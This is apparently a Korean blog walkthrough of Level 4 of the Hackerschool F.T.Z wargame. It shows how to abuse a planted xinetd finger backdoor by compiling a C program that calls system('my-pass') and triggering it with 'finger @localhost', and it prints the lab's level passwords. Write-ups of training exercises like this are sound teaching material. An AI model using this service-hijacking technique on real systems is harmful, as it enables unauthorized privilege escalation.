2015. 4. 14. 00:00ㆍSystem/F.T.Z
F.T.Z Level4 문제풀이
먼저 리눅스를 접해보지 않으신분들에겐 다소 명령어가 생소하실겁니다.
실습환경 : VMware Red Hat 9.0 (해커스쿨 F.T.Z 로컬 VM이미지)
한글 Putty 0.60
다운로드 : http://gmyankee.tistory.com/42
login as : level4
password : suck my brain
ls 명령으로 디렉터리 목록을 확인합시다.
[level4@ftz level4]$ ls
hint public_html tmp
cat 명령으로 hint파일을 확인해봅시다.
[level4@ftz level4]$ cat hint
누군가 /etc/xinetd.d/에 백도어를 심어놓았다.!
백도어라니 우리같은 포너지망생들에겐 흥미로운 것 이죠 일단
저 경로를 확인해봅시다.
[level4@ftz level4]$ cd /etc/xinetd.d
[level4@ftz level4]$ ls -al /etc/xinetd.d
진짜 떡하니 backdoor 라고 써있네요.
하지만 권한을 보니 우리에겐 실행도 수정도 할 수 없습니다.
하지만 읽기 권한이 있는걸 보아하니
[level4@ftz level4]$ cat /etc/xinetd.d/backdoor
또는 저처럼 버릇이 이상하게 들면 경로 이동후 확인하게 됩니다.
cat 명령으로 backdoor 파일을 확인해보니
finger service를 이용한 것 같았습니다.
finger란 리눅스에서 사용자들의 정보를 확인하는 명령어입니다.
자세한 건 따로 검색하세요!
자 그런데
server 라는 부분에 경로가 있네요 한번 이동해보도록 하겠습니다.
제가 올려둔 VM image를 받으신분들은 혹시나 level4의 backdoor가 작성되있을수 있습니다.
[level4@ftz level4]$ rm -rf backdoor backdoor.c
라고 입력해서 제거해주세요.
자 그럼 백도어 파일이 없어야 정상입니다.
제가 옛날에 F.T.Z를 한번 풀어보면서 만들어놨던것같네요..
그럼 백도어 파일을 한번 작성해 보겠습니다.
[level4@ftz level4]$ vim backdoor.c
#include <stdio.h> #include <stdlib.h> int main(void) { system("my-pass"); return 0; } |
위처럼 작성하시고
Esc누르시고 :wq 입력후 저장종료를 합니다.
작성한 백도어 파일을 컴파일겸 실행파일로 만들기 위해서
gcc를 이용하여 컴파일 하도록합시다.
[level4@ftz level4]$ gcc -o backdoor backdoor.c
ls -al 명령으로 확인해보니 backdoor 파일이 정상적으로 컴파일되어 생성되었네요.
[level4@ftz level4]$ finger @localhost
를 입력하여 finger 로 localhost의 정보를 확인합시다.
이상하게 잘안뜨는 경우가 있는데 엔터를 열라 친다음에 finger@localhost 하면 뜨더군요.. 저만그런건지..
Level5 Password is "what is your name?".
'System > F.T.Z' 카테고리의 다른 글
F.T.Z Level6 문제풀이 (0) | 2015.04.16 |
---|---|
F.T.Z Level5 문제풀이 (0) | 2015.04.15 |
F.T.Z Level3 문제풀이 (0) | 2015.04.13 |
F.T.Z Level2 문제풀이 (0) | 2015.04.12 |
F.T.Z - Level1 문제풀이 (0) | 2015.04.11 |